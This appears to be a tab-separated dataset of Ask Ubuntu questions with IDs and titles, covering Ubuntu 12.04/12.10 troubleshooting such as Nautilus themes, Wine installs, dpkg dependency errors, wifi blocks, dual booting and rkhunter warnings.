254876	nautilus theme problem in 12.04	i have encountered a strange theme problem since i updated to 12.04 some days ago : nautilus needs some extra treatment after every login in order to obey the theme . it concerns every user . after every login the theme in nautilus ( and only in nautilus , no other program is concerned ) is set to orange-grey standard theme . following steps bring back the correct theme : in terminal i have to enter nautilus -q nautilus now nautilus has its complete theme back , but now desktop does n't present any files and the context menu is not working anymore . again in terminal i have to enter gsettings set org.gnome.desktop.background show-desktop-icons false gsettings set org.gnome.desktop.background show-desktop-icons true after this theme in nautilus and desktop both work fine ... until next login . i want to underline , that only nautilus has this problem . i use compiz and cairodock and have a twinview configuration , using nvidia proprietary driver . my question : what can i do to avoid these annoying procedure ? edit : meanwhile i think this happens because nautilus is started on logon to handle desktop before gnome-settings-daemon has done its work completely . so i tried to look in gnome-session-properties how and when nautilus is started , but there is no corresponding entry . how can i verify whether my presumption is right or not ?
254879	i switched to 12.10 and my wine - adobe digital editions stuff stopped working	i switched to 12.10 and my wine - adobe digital editions stuff stopped working . i un-installed wine and reinstalled wine1.5 . now what to do about adobe digital editions ? i have deleted and re-installed adobe digital editions and it appears to run , however it no longer shows my nook . i tried the wine configuration tool to set the nook to be a floppy disk but after i apply and ok when i re-open the wine tool the selection for the nook has reverted to autodetect . has anyone got around this new problem ? if i leave the wine configuration pane open i can see the nook , but when i ok and close the wine pane the selection does n't stick .
254880	sudo dpkg -- configure dpkg : error processing default-jdk ( -- configure ) :	default-jre depends on default-jre-headless ( = 1:1.7-43ubuntu3 ) ; however : package default-jre-headless is not installed . dpkg : error processing default-jre ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of default-jdk : default-jdk depends on default-jre ( = 1:1.7-43ubuntu3 ) ; however : package default-jre is not configured yet . dpkg : error processing default-jdk ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : default-jre default-jdk how can i solve this ? actually i had another problem ( ( failing package manager ? ) ) and found a solution here , but then dpkg gives above error .
254881	how to dual boot mac os x and ubuntu without refit	i want to install ubuntu on my mac but i do n't want have to use refit . can i do that ? can i just hold the option key on startup and use that to pick what i startup with ? and if so would i install ubuntu the same way just skipping the refit part ? thanks . and i 'm running os x 10.8.2
255890	how can i adjust the mouse scroll speed ?	this question has been asked many times with no answer . i 've used my basic google skills and have n't come across a fix . this is system wide . my mouse simply scrolls too fast . i 'm new to ubuntu and linux in general . would switching styles or whatever it is called ( ubuntu , kde , xubuntu ) help at all ? is there a terminal code i can enter ?
255898	can i stop my mouse from [ accidentally ] pasting text to irc channels ?	xubuntu 12.10 i do not mind that text is occasionally pasted when i can simply ctrl+z most things , or simply erase the text . currently however , when i ssh to a server running my irc client , clicking the mouse3 button on the window will more than likely paste text in a very unforgiving manner ! that means i ca n't take back whatever my mouse decided to [ accidentally ] tell the other irc members ( yes it is the mouse 's fault ) . therefore : can i disable middle-mouse pasting to a terminal window without losing an arm or a leg ? perhaps this is too localized , but i am sure plenty of people have had the same issue with irc and have empathy for this issue : )
255901	mouse touchpad stops intermittently ubuntu 12.04	my touchpad stops working when the computer comes out of `` suspend '' . it usually takes exactly 3 reboots to make it start working again . external mice do not have this problem . how do i tell if this is a software or hardware issue ? the computer is a toshiba satellite m300 .
255903	how do i get my wireless adapter to work for my own ubuntu 12.04 ?	i have purchased the asus usb-n13 usb wireless adapter for my desktop computer running ubuntu 12.04 . it said it had linux support , so i went with it . i found out from their customer support that it does n't support ubuntu , but it 's not impossible to get it to work . i have tried looking up proper drivers and such to download . i 've gotten it to recognize my router , but it still wo n't connect . all these solutions i 'm seeing seem to be just for specific computers and not a general fix , so can someone help me find a solution to this dilemma ? i have tried other solutions i find on here , but they do n't work for my own computer . so please give this question a chance . i 've tried this one : connecting asus usb n13 wireless-adapter but it fails at the third step in the terminal after downloading the drivers from realtek . in step 3 of the terminal process it involves building the drivers , with the text cd ~/downloads/rtl8188c_8192c_usb_linux_v3.4.3_4369.20120622 but it just tells me `` no such file or directory exists . '' also , at the beginning of the question , the asker said they put in lsmod | grep rt i tried that and got a different result than what they got . theirs : parport_pc rtl8192cu rtl8192c_common rtlwifi mac80211 cfg80211 parport mine : parport_pc 32114 0 parport 40930 3 parport_pc , ppdev , lp i do n't know how to further differentiate my problem from other questions , just that my computer 's specs may be different than that of the computers used in these different questions . any help would be appreciated .
255906	installer stuck	i used the windows installer , restarted the laptop , and choose to start ubuntu . it 's going through the installer , but is currently stuck on something and it keeps repeating that . is there anyway to skip that and keep going ? edit : looks like my computer froze.. so i do n't have to worry about it until next try..
255911	the bug reporting process prevents me from reporting my bug	i read through the reporing bugs community wiki . i am unsure exactly what kind of package to report my bug against . the problem is that my usb sound device will only work if connected at boot , but not if i plug it in after . so , is it a usb bug , a sound bug , or a boot problem ? i do n't know . so , according to the wiki , it says : if you 're not sure which package is affected by the bug , type ubuntu-bug in the `` run application '' window and click run so i do exactly that . i 'm given this dialog : the only usb option is for storage devices , and i 'm not sure if it 's a sound problem or usb problem or what , so i go with `` other problem '' . but then i 'm simply dismissed with a `` no package specified '' error . how was i supposed to specify a package when the reason i chose `` other problem '' was because i 'm not sure what 's going on ? so i restart the bug reporting process , this time selecing `` sound/audio related problems '' . i get this message : ... but wait ... pulse had n't crashed before i started the bug reporting process , so is it the bug reporting process itself that crashed pulse , and if so , then is n't that separate from the bug i want to report ? at this point i 've lost confidence in the bug reporting procedure . this is not the first time i have encountered the incredibly user-unfriendly ubuntu bug reporting process , so i could go off on a rant about it . but i wo n't . what i really want is just to be able to plug my usb audio device in after booting and not think about ubuntu bug policies and politics . so ... how can i report this bug without getting stonewalled and diverted ?
255913	wifi hardware blocked ( lenovo g560 )	~ $ lspci | grep network 06:00.0 network controller : intel corporation wimax/wifi link 5150 ~ $ rfkill list all 0 : hci0 : bluetooth soft blocked : yes hard blocked : no 1 : i2400m-usb:1-1.1:1.0 : wimax soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : yes ~ $ sudo rfkill unblock all but wifi is still disabled . here is some info : ~ $ sudo lshw -class network *-network disabled description : wireless interface product : wimax/wifi link 5150 vendor : intel corporation physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan0 version : 00 serial : 00:16 : eb:2b:1d:90 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-37-generic firmware=8.24.2.2 latency=0 link=no multicast=yes wireless=ieee 802.11abg i tried also : default all bios settings . removing the battery . it worked couple of days ago , but now i really do n't know what to do . can someone help me ? update : ~ $ dmesg | grep iwl [ 14.184885 ] iwlwifi 0000:06:00.0 : found pci int a - > irq 10 [ 14.184885 ] iwlwifi 0000:06:00.0 : sharing irq 10 with 0000:00:1c.0 [ 14.184885 ] iwlwifi 0000:06:00.0 : sharing irq 10 with 0000:00:1c.4 [ 14.184885 ] iwlwifi 0000:06:00.0 : sharing irq 10 with 0000:01:00.1 [ 14.184885 ] iwlwifi 0000:06:00.0 : setting latency timer to 64 [ 14.184885 ] iwlwifi 0000:06:00.0 : pci_resource_len = 0x00002000 [ 14.184885 ] iwlwifi 0000:06:00.0 : pci_resource_base = ffffc90002184000 [ 14.184885 ] iwlwifi 0000:06:00.0 : hw revision id = 0x0 [ 14.184885 ] iwlwifi 0000:06:00.0 : irq 19 for msi/msi-x [ 14.184885 ] iwlwifi 0000:06:00.0 : detected intel ( r ) wimax/wifi link 5150 abg , rev=0x44 [ 14.184885 ] iwlwifi 0000:06:00.0 : l1 disabled ; enabling l0s [ 14.204887 ] iwlwifi 0000:06:00.0 : device eeprom ver=0x223 , calib=0x4 [ 14.204887 ] iwlwifi 0000:06:00.0 : device sku : 0xb0 [ 14.204887 ] iwlwifi 0000:06:00.0 : valid tx ant : 0x1 , valid rx ant : 0x3 [ 15.048939 ] iwlwifi 0000:06:00.0 : tunable channels : 13 802.11bg , 24 802.11a channels [ 15.048939 ] iwlwifi 0000:06:00.0 : rf_kill bit toggled to disable radio . [ 15.104943 ] iwlwifi 0000:06:00.0 : loaded firmware version 8.24.2.2 here is modules : ~ $ lsmod module size used by vesafb 13844 1 joydev 17693 0 ums_realtek 18248 0 snd_hda_codec_hdmi 32474 4 uas 18180 0 arc4 12529 2 nvidia 12319264 52 i2400m_usb 36569 0 i2400m 108026 1 i2400m_usb wimax 34762 1 i2400m rfcomm 47604 12 bnep 18281 2 parport_pc 32866 0 ppdev 17113 0 binfmt_misc 17540 1 snd_hda_codec_conexant 62358 1 snd_hda_intel 33773 7 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel snd_hwdep 17764 1 snd_hda_codec snd_pcm 97275 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec uvcvideo 72627 0 videodev 98259 1 uvcvideo v4l2_compat_ioctl32 17128 1 videodev btusb 18332 2 bluetooth 180153 23 rfcomm , bnep , btusb psmouse 97485 0 snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi mac_hid 13253 0 serio_raw 13211 0 iwlwifi 397059 0 mac80211 506862 1 iwlwifi cfg80211 205774 2 iwlwifi , mac80211 snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 3 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 79041 22 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device mei 41616 0 soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm lp 17799 0 parport 46562 3 parport_pc , ppdev , lp usb_storage 49198 1 ums_realtek usbhid 47238 0 hid 99636 1 usbhid r8169 62154 0
255914	some indicators are missing when unlocking the screen	it happened on my old pc and it still happens with the new one , with a fresh ubuntu 12.10 installation ( unity ) . when returning from a screen lock ( i could n't say if it can be replicated in other ways ) , some indicators are missing : pidgin , thunderbird ( with firetray extension ) , jdownloader ... i do n't know whether those indicators have something wrong regarding unity 's tray or something related with global menu is cutting out a certain size of left edge of a long tray , whatever it contains .
255915	how to setup ipv6 on ubuntu host with two vms	i want to setup ipv6 network with two vms ( virtual box ) on a ubuntu 12.04 host . one vm is backtrack and second is window xp . i want to know that how can i setup a fully ipv6 network so that i can communicate form backtrack to xp on virtual box network attached in bridged adapter mode , all traffic from backtrack to xp should goes through ubuntu host . is it also possible to configure ubuntu host as a dhcpv6 server so that it serve ipv6 to vms automatically and able to communicate . i appreciate any help . thanks
255925	does ubuntu one re-load a file after renaming it ?	i write countless drafts of folders but sometimes i want to change the title of a doc - the content of which has n't been altered . does u1 reload the entire word doc or does it just rename it ? basically can it tell the difference between a changed file and a renamed file ?
255926	i am unable to install wine due to issues with multiarch support . what can i do to resolve this issue ?	i cant install wine . cant do anything with this . sudo aptitude install wine1.5 the following new packages will be installed : libasn1-8-heimdal : i386 { a } libasound2 : i386 { a } libasyncns0 : i386 { a } libavahi-client3 : i386 { a } libavahi-common-data : i386 { a } libavahi-common3 : i386 { a } libc6 : i386 { a } libcapi20-3 { a } libcapi20-3 : i386 { a } libcomerr2 : i386 { a } libcups2 : i386 { a } libdb5.1 : i386 { a } libdbus-1-3 : i386 { a } libdrm-intel1 : i386 { ab } libdrm-nouveau1a : i386 { ab } libdrm-radeon1 : i386 { ab } libdrm2 : i386 { ab } libexif12 : i386 { a } libexpat1 : i386 { a } libffi6 : i386 { a } libflac8 : i386 { a } libfontconfig1 : i386 { a } libfreetype6 : i386 { a } libgcc1 : i386 { a } libgcrypt11 : i386 { a } libgd2-xpm : i386 { a } libgif4 : i386 { a } libgl1-mesa-dri : i386 { ab } libgl1-mesa-glx : i386 { ab } libglapi-mesa : i386 { ab } libglib2.0-0 : i386 { a } libglu1-mesa : i386 { a } libgnutls26 : i386 { a } libgpg-error0 : i386 { a } libgphoto2-2 : i386 { a } libgphoto2-port0 : i386 { a } libgpm2 : i386 { a } libgssapi-krb5-2 : i386 { a } libgssapi3-heimdal : i386 { a } libgstreamer-plugins-base0.10-0 : i386 { a } libgstreamer0.10-0 : i386 { a } libhcrypto4-heimdal : i386 { a } libheimbase1-heimdal : i386 { a } libheimntlm0-heimdal : i386 { a } libhx509-5-heimdal : i386 { a } libice6 : i386 { a } libieee1284-3 : i386 { a } libjpeg-turbo8 : i386 { a } libjpeg8 : i386 { a } libjson0 : i386 { a } libk5crypto3 : i386 { a } libkeyutils1 : i386 { a } libkrb5-26-heimdal : i386 { a } libkrb5-3 : i386 { a } libkrb5support0 : i386 { a } liblcms1 : i386 { a } libldap-2.4-2 : i386 { a } libllvm3.0 : i386 { a } libltdl7 : i386 { a } libmpg123-0 : i386 { a } libncurses5 : i386 { a } libodbc1 { a } libogg0 : i386 { a } libopenal1 : i386 { a } liborc-0.4-0 : i386 { a } libosmesa6 : i386 { a } libp11-kit0 : i386 { a } libpam-winbind { a } libpciaccess0 : i386 { a } libpcre3 : i386 { a } libpng12-0 : i386 { a } libpulse0 : i386 { a } libroken18-heimdal : i386 { a } libsane : i386 { a } libsasl2-2 : i386 { a } libsasl2-modules : i386 { a } libselinux1 : i386 { a } libsm6 : i386 { a } libsndfile1 : i386 { a } libsqlite3-0 : i386 { a } libssl1.0.0 : i386 { a } libstdc++6 : i386 { ab } libtasn1-3 : i386 { a } libtiff4 : i386 { a } libtinfo5 : i386 { a } libusb-0.1-4 : i386 { a } libuuid1 : i386 { a } libv4l-0 : i386 { a } libv4lconvert0 : i386 { a } libvorbis0a : i386 { a } libvorbisenc2 : i386 { a } libwind0-heimdal : i386 { a } libwrap0 : i386 { a } libx11-6 : i386 { a } libx11-xcb1 : i386 { a } libxau6 : i386 { a } libxcb-glx0 : i386 { a } libxcb1 : i386 { a } libxcomposite1 : i386 { a } libxcursor1 : i386 { a } libxdamage1 : i386 { a } libxdmcp6 : i386 { a } libxext6 : i386 { a } libxfixes3 : i386 { a } libxi6 : i386 { a } libxinerama1 : i386 { a } libxml2 : i386 { a } libxpm4 : i386 { a } libxrandr2 : i386 { a } libxrender1 : i386 { a } libxslt1.1 : i386 { a } libxt6 : i386 { a } libxxf86vm1 : i386 { a } ttf-umefont { a } ttf-unfonts-core { a } unixodbc { a } winbind { a } wine-gecko1.9 { a } wine-gecko1.9 : i386 { a } wine-mono0.0.8 { a } wine1.5 wine1.5-amd64 { a } wine1.5-i386 : i386 { a } winetricks { a } zlib1g : i386 { a } 0 packages upgraded , 125 newly installed , 0 to remove and 0 not upgraded . need to get 173 mb of archives . after unpacking 452 mb will be used . the following packages have unmet dependencies : libstdc++6 : breaks : libstdc++6 : i386 ( ! = 4.7.2-11precise2 ) but 4.6.3-1ubuntu5 is to be installed . libstdc++6 : i386 : breaks : libstdc++6 ( ! = 4.6.3-1ubuntu5 ) but 4.7.2-11precise2 is installed . libdrm-radeon1 : breaks : libdrm-radeon1 : i386 ( ! = 2.4.39-0ubuntu1 ) but 2.4.39-0ubuntu0.1 is to be installed . libdrm-radeon1 : i386 : breaks : libdrm-radeon1 ( ! = 2.4.39-0ubuntu0.1 ) but 2.4.39-0ubuntu1 is installed . libgl1-mesa-dri : breaks : libgl1-mesa-dri : i386 ( ! = 9.0-0ubuntu1 ) but 8.0.4-0ubuntu0.3 is to be installed . libgl1-mesa-dri : i386 : breaks : libgl1-mesa-dri ( ! = 8.0.4-0ubuntu0.3 ) but 9.0-0ubuntu1 is installed . libgl1-mesa-glx : breaks : libgl1-mesa-glx : i386 ( ! = 9.0-0ubuntu1 ) but 8.0.4-0ubuntu0.3 is to be installed . libgl1-mesa-glx : i386 : breaks : libgl1-mesa-glx ( ! = 8.0.4-0ubuntu0.3 ) but 9.0-0ubuntu1 is installed . libglapi-mesa : breaks : libglapi-mesa : i386 ( ! = 9.0-0ubuntu1 ) but 8.0.4-0ubuntu0.3 is to be installed . libglapi-mesa : i386 : breaks : libglapi-mesa ( ! = 8.0.4-0ubuntu0.3 ) but 9.0-0ubuntu1 is installed . libdrm2 : breaks : libdrm2 : i386 ( ! = 2.4.39-0ubuntu1 ) but 2.4.39-0ubuntu0.1 is to be installed . libdrm2 : i386 : breaks : libdrm2 ( ! = 2.4.39-0ubuntu0.1 ) but 2.4.39-0ubuntu1 is installed . libdrm-nouveau1a : breaks : libdrm-nouveau1a : i386 ( ! = 2.4.39-0ubuntu1 ) but 2.4.39-0ubuntu0.1 is to be installed . libdrm-nouveau1a : i386 : breaks : libdrm-nouveau1a ( ! = 2.4.39-0ubuntu0.1 ) but 2.4.39-0ubuntu1 is installed . libdrm-intel1 : breaks : libdrm-intel1 : i386 ( ! = 2.4.39-0ubuntu1 ) but 2.4.39-0ubuntu0.1 is to be installed . libdrm-intel1 : i386 : breaks : libdrm-intel1 ( ! = 2.4.39-0ubuntu0.1 ) but 2.4.39-0ubuntu1 is installed . internal error : the solver install ( wine1.5 : i386 1.5.23-0ubuntu1 < wine1.5-amd64 : amd64 1.5.23-0ubuntu1 - > { wine1.5 : amd64 1.5.23-0ubuntu1 wine1.5 : i386 1.5.23-0ubuntu1 } > ) of a supposedly unresolved dependency is already installed in step 18 internal error : the solver install ( dpkg : amd64 1.16.1.2ubuntu7 < wine-gecko1.9 : i386 1.9-0ubuntu1~ppa1~precise1 - > { dpkg : amd64 1.16.1.2ubuntu7 dpkg : amd64 1.16.1.2ubuntu7.1 dpkg : i386 1.16.1.2ubuntu7 dpkg : i386 1.16.1.2ubuntu7.1 } > ) of a supposedly unresolved dependency is already installed in step 411 open : 135 ; closed : 364 ; defer : 109 ; conflict : 202 .the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) libasn1-8-heimdal : i386 [ not installed ] 2 ) libasound2 : i386 [ not installed ] 3 ) libasyncns0 : i386 [ not installed ] 4 ) libavahi-client3 : i386 [ not installed ] 5 ) libavahi-common3 : i386 [ not installed ] 6 ) libc6 : i386 [ not installed ] 7 ) libcapi20-3 : i386 [ not installed ] 8 ) libcomerr2 : i386 [ not installed ] 9 ) libcups2 : i386 [ not installed ] 10 ) libdb5.1 : i386 [ not installed ] 11 ) libdbus-1-3 : i386 [ not installed ] 12 ) libdrm-intel1 : i386 [ not installed ] 13 ) libdrm-nouveau1a : i386 [ not installed ] 14 ) libdrm-radeon1 : i386 [ not installed ] 15 ) libdrm2 : i386 [ not installed ] 16 ) libexif12 : i386 [ not installed ] 17 ) libexpat1 : i386 [ not installed ] 18 ) libffi6 : i386 [ not installed ] 19 ) libflac8 : i386 [ not installed ] 20 ) libfontconfig1 : i386 [ not installed ] 21 ) libfreetype6 : i386 [ not installed ] 22 ) libgcc1 : i386 [ not installed ] 23 ) libgcrypt11 : i386 [ not installed ] 24 ) libgd2-xpm : i386 [ not installed ] 25 ) libgif4 : i386 [ not installed ] 26 ) libgl1-mesa-dri : i386 [ not installed ] 27 ) libgl1-mesa-glx : i386 [ not installed ] 28 ) libglapi-mesa : i386 [ not installed ] 29 ) libglib2.0-0 : i386 [ not installed ] 30 ) libglu1-mesa : i386 [ not installed ] 31 ) libgnutls26 : i386 [ not installed ] 32 ) libgpg-error0 : i386 [ not installed ] 33 ) libgphoto2-2 : i386 [ not installed ] 34 ) libgphoto2-port0 : i386 [ not installed ] 35 ) libgpm2 : i386 [ not installed ] 36 ) libgssapi-krb5-2 : i386 [ not installed ] 37 ) libgssapi3-heimdal : i386 [ not installed ] 38 ) libgstreamer-plugins-base0.10-0 : i386 [ not installed ] 39 ) libgstreamer0.10-0 : i386 [ not installed ] 40 ) libhcrypto4-heimdal : i386 [ not installed ] 41 ) libheimbase1-heimdal : i386 [ not installed ] 42 ) libheimntlm0-heimdal : i386 [ not installed ] 43 ) libhx509-5-heimdal : i386 [ not installed ] 44 ) libice6 : i386 [ not installed ] 45 ) libieee1284-3 : i386 [ not installed ] 46 ) libjpeg-turbo8 : i386 [ not installed ] 47 ) libjpeg8 : i386 [ not installed ] 48 ) libjson0 : i386 [ not installed ] 49 ) libk5crypto3 : i386 [ not installed ] 50 ) libkeyutils1 : i386 [ not installed ] 51 ) libkrb5-26-heimdal : i386 [ not installed ] 52 ) libkrb5-3 : i386 [ not installed ] 53 ) libkrb5support0 : i386 [ not installed ] 54 ) liblcms1 : i386 [ not installed ] 55 ) libldap-2.4-2 : i386 [ not installed ] 56 ) libllvm3.0 : i386 [ not installed ] 57 ) libltdl7 : i386 [ not installed ] 58 ) libmpg123-0 : i386 [ not installed ] 59 ) libncurses5 : i386 [ not installed ] 60 ) libogg0 : i386 [ not installed ] 61 ) libopenal1 : i386 [ not installed ] 62 ) liborc-0.4-0 : i386 [ not installed ] 63 ) libosmesa6 : i386 [ not installed ] 64 ) libp11-kit0 : i386 [ not installed ] 65 ) libpciaccess0 : i386 [ not installed ] 66 ) libpcre3 : i386 [ not installed ] 67 ) libpng12-0 : i386 [ not installed ] 68 ) libpulse0 : i386 [ not installed ] 69 ) libroken18-heimdal : i386 [ not installed ] 70 ) libsane : i386 [ not installed ] 71 ) libsasl2-2 : i386 [ not installed ] 72 ) libsasl2-modules : i386 [ not installed ] 73 ) libselinux1 : i386 [ not installed ] 74 ) libsm6 : i386 [ not installed ] 75 ) libsndfile1 : i386 [ not installed ] 76 ) libsqlite3-0 : i386 [ not installed ] 77 ) libssl1.0.0 : i386 [ not installed ] 78 ) libstdc++6 : i386 [ not installed ] 79 ) libtasn1-3 : i386 [ not installed ] 80 ) libtiff4 : i386 [ not installed ] 81 ) libtinfo5 : i386 [ not installed ] 82 ) libusb-0.1-4 : i386 [ not installed ] 83 ) libuuid1 : i386 [ not installed ] 84 ) libv4l-0 : i386 [ not installed ] 85 ) libv4lconvert0 : i386 [ not installed ] 86 ) libvorbis0a : i386 [ not installed ] 87 ) libvorbisenc2 : i386 [ not installed ] 88 ) libwind0-heimdal : i386 [ not installed ] 89 ) libwrap0 : i386 [ not installed ] 90 ) libx11-6 : i386 [ not installed ] 91 ) libx11-xcb1 : i386 [ not installed ] 92 ) libxau6 : i386 [ not installed ] 93 ) libxcb-glx0 : i386 [ not installed ] 94 ) libxcb1 : i386 [ not installed ] 95 ) libxcomposite1 : i386 [ not installed ] 96 ) libxcursor1 : i386 [ not installed ] 97 ) libxdamage1 : i386 [ not installed ] 98 ) libxdmcp6 : i386 [ not installed ] 99 ) libxext6 : i386 [ not installed ] 100 ) libxfixes3 : i386 [ not installed ] 101 ) libxi6 : i386 [ not installed ] 102 ) libxinerama1 : i386 [ not installed ] 103 ) libxml2 : i386 [ not installed ] 104 ) libxpm4 : i386 [ not installed ] 105 ) libxrandr2 : i386 [ not installed ] 106 ) libxrender1 : i386 [ not installed ] 107 ) libxslt1.1 : i386 [ not installed ] 108 ) libxt6 : i386 [ not installed ] 109 ) libxxf86vm1 : i386 [ not installed ] 110 ) wine-gecko1.9 : i386 [ not installed ] 111 ) wine1.5 [ not installed ] 112 ) wine1.5-amd64 [ not installed ] 113 ) wine1.5-i386 : i386 [ not installed ] 114 ) zlib1g : i386 [ not installed ] leave the following dependencies unresolved : 115 ) libncurses5 : i386 recommends libgpm2 : i386 116 ) libgl1-mesa-glx : i386 recommends libgl1-mesa-dri : i386 ( > = 7.2 ) 117 ) libgphoto2-2 : i386 recommends udev : i386 ( > = 0.175 ) 118 ) libgphoto2-2 : i386 recommends libgphoto2-l10n : i386 ( > = 2.4.13-1ubuntu1.2 ) 119 ) winetricks recommends wine1.5 | wine1.4 | wine | cxoffice5 | cxgames5 120 ) wine-mono0.0.8 recommends wine1.5 121 ) wine-gecko1.9 recommends wine1.5-amd64 122 ) wine1.5-i386 : i386 recommends libsane : i386 123 ) wine-gecko1.9 : i386 recommends wine1.5-i386 : i386 accept this solution ? [ y/n/q/ ? ] y no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used .
255930	failure , error when running office 2007 under wine	i am trying to run office 2007 using wine , everything installed fine but when i try to open any file using word , excel i get dde failure , or an exception please refer to attached screen shot
255931	wifi stays on during sleep ( suspend )	my wifi led indicator stays on when i suspend ubuntu . i do n't know if the wifi card stays on itself but i know that i can barely get 2 to 3 hours of sleep time when the wifi is on ! but when it is off i get much much longer . specs : ubuntu 12.04 and vaio vpc-z135 . wireless chip is intel corporation centrino advanced-n 6200 .
255938	how to recover drivers when upgrading from xp to ubuntu	i have an old computer running on windows xp which im going to convert to ubuntu using whole disk ( not dual boot ) , will i lose my cd/dvd and memory card readers drivers ? how do i re-install drivers ?
255939	dual boot ubuntu 12.10 and windows 8 dell inspiron 15 r	i purchased a new dell 15r laptop which came with pre installed windows 8 64 bit and ueifi boot . i made a ubuntu 12.10 dvd and loaded it . when i started installing my installer could not recognise any other windows 8 or any other os installed . when i moved to advanced partition tool , i could see my free space , my windows partitions . but i did not proceed . can anyone help .
255941	any reason to have a strong user password ?	i recently decided to change my ( very ) strong user password to something trivial . this was mostly to eliminate frustration with typing a long password each time i sudo or whatever . my question is , is there any reason to have a strong user password ? considering that most services which i run on my box do not use pam for auth : apache2 - uses .htpasswd for access sshd - only private keys allowed transmissiond - uses its own http auth mpd - uses its own auth samba - limited to lan physical access to the box is out of the question .
255950	rkhunter : right way to handle warnings further ?	i googled some and checked out two first links it found : http : //www.skullbox.net/rkhunter.php http : //www.techerator.com/2011/07/how-to-detect-rootkits-in-linux-with-rkhunter/ they do n't mention what shall i do in case of such warnings : warning : the command '/bin/which ' has been replaced by a script : /bin/which : posix shell script text executable warning : the command '/usr/sbin/adduser ' has been replaced by a script : /usr/sbin/adduser : a /usr/bin/perl script text executable warning : the command '/usr/bin/ldd ' has been replaced by a script : /usr/bin/ldd : bourne-again shell script text executable warning : the file properties have changed : file : /usr/bin/lynx current hash : 95e81c36428c9d955e8915a7b551b1ffed2c3f28 stored hash : a46af7e4154a96d926a0f32790181eabf02c60a4 q1 : is there more extended howtos which explain how to deal with different kind warnings ? and the second question . were my actions sufficient to resolve these warnings ? a ) to find the package which contains the suspicious file , e.g . it is debianutils for the file /bin/which ~ > dpkg -s /bin/which debianutils : /bin/which b ) to check the debianutils package checksums : ~ > debsums debianutils /bin/run-parts ok /bin/tempfile ok /bin/which ok /sbin/installkernel ok /usr/bin/savelog ok /usr/sbin/add-shell ok /usr/sbin/remove-shell ok /usr/share/man/man1/which.1.gz ok /usr/share/man/man1/tempfile.1.gz ok /usr/share/man/man8/savelog.8.gz ok /usr/share/man/man8/add-shell.8.gz ok /usr/share/man/man8/remove-shell.8.gz ok /usr/share/man/man8/run-parts.8.gz ok /usr/share/man/man8/installkernel.8.gz ok /usr/share/man/fr/man1/which.1.gz ok /usr/share/man/fr/man1/tempfile.1.gz ok /usr/share/man/fr/man8/remove-shell.8.gz ok /usr/share/man/fr/man8/run-parts.8.gz ok /usr/share/man/fr/man8/savelog.8.gz ok /usr/share/man/fr/man8/add-shell.8.gz ok /usr/share/man/fr/man8/installkernel.8.gz ok /usr/share/doc/debianutils/copyright ok /usr/share/doc/debianutils/changelog.gz ok /usr/share/doc/debianutils/readme.shells.gz ok /usr/share/debianutils/shells ok c ) to relax about /bin/which as i see ok /bin/which ok d ) to put the file /bin/which to /etc/rkhunter.conf as scriptwhitelist= '' /bin/which '' e ) for warnings as for the file /usr/bin/lynx i update checksum with rkhunter -- propupd /usr/bin/lynx.cur q2 : do i resolve such warnings right way ?
255951	ubuntu on galaxy note ii	i recently bought samsung galaxy note ii on android 4.1 . it was my idea to try to turn it into a pc and i bought a micro-keyboard for the same purpose . i had hoped there would be an app for openoffice , but there is n't . now i see that ubuntu may be installed on smart phones . i already have ubuntu - including openoffice - on my laptop . my question is : is it possible to install ubuntu to galaxy note ii , and if so , does it include office programs and other ubuntu programs ? thank you and thank you so much for an alternative to microsoft .
255960	user-dirs.dirs does n't work	i put this in my ~/.config/user-dirs.dirs ... but does n't work ( only the desktop part is working ) : xdg_desktop_dir= '' /media/e/administrateur/bureau/ '' xdg_download_dir= '' $ home/téléchargements '' xdg_templates_dir= '' $ home/modèles '' xdg_publicshare_dir= '' $ home/public '' xdg_documents_dir= '' /media/e/administrateur/mes_documents/ '' xdg_music_dir= '' /media/e/administrateur/mes_documents/ma_musique/ '' xdg_pictures_dir= '' $ home/ '' xdg_videos_dir= '' $ home/ '' when i go to ~/documents it is still empty ... is there something wrong ? thanks
255968	gvfs-open does not authenticate password	i installed nautilus-actions-extra from the ppa : nae-team/ppa . however , when i try to use the right click function , `` open as root '' in nautilus , gvfs-open can not recognize my root password . any idea how to fix this issue ? also , after installing the nautilus-actions-extra , the keyring does not get unlocked after i login . it asks for keyring password everytime i login . edit : i deleted the default.keyring file from .gnome2 , and created a new file , but the same thing keeps happening . there is an option to automatically unlock the keyring which is greyed out . ... managed to fix the second issue by following this answer
255970	pxe boot ubuntu 12.04 customization	just configured my ubuntu 12.04 server to play host to a diskless pxe/nfs system . currently i 'm deploying the ubuntu 12.04 desktop live cd to all my clients ( derived from the install cd ) . my question is , how do i enroll a custom image ( i.e . loading custom software , custom backgrounds , configs , drivers , etc ) to all the clients ? i used the following tutorial to configure my server . any suggestions , i 'm unable to find any good tutorials for this . found these sites but am i on the right path ? remastersys | uck
255973	ubuntu does not run on the nexus 7	after `` preparing mouth file system '' , the screensaver ubuntu nexus have a black screen . what to do ?
255975	how to install a program from a .tar.gz	i already extracted the file and when i drag the file to the terminal this is the directory i get `` '/home/ali/downloads/stencyl-2.1.0 `` . now can someone give me exact instructions for this directory for exactly installing the program . thanks in advance
255980	mapping problem : `` go back '' button opens a dialog box in 12.10	i just made a fresh install of 12.10 and the `` go back '' or `` previous page '' button on my keybord ( lenovo thinkpad ) , opens a dialog box when used with firefox . how can i avoid this ? thanks
